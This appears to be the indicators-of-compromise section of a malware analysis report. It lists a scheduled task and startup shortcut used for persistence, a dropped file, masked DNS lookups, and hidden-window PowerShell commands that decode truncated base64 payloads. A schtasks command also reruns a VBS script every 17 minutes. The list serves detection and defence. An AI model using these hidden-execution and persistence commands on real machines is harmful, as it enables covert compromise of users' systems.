Technical information
- <SYSTEM32>\tasks\windowsapplicationservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsapplicationservice.lnk
- C:\users\public\libraries\thumbcache_64.db
- DNS ASK ge##.###gmonthairsalon.com
- DNS ASK ag####kxmdqx.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHpzY2RqdWogPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICR6c2...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHpzY2RqdWogPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICR6c2...
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
- '<SYSTEM32>\taskeng.exe' {46ED820E-3D00-4861-A57F-EB70FE480B9C} S-1-5-21-1960123792-2022915161-3775307078-1001:mchagqwuvlhr\user:Interactive:[1]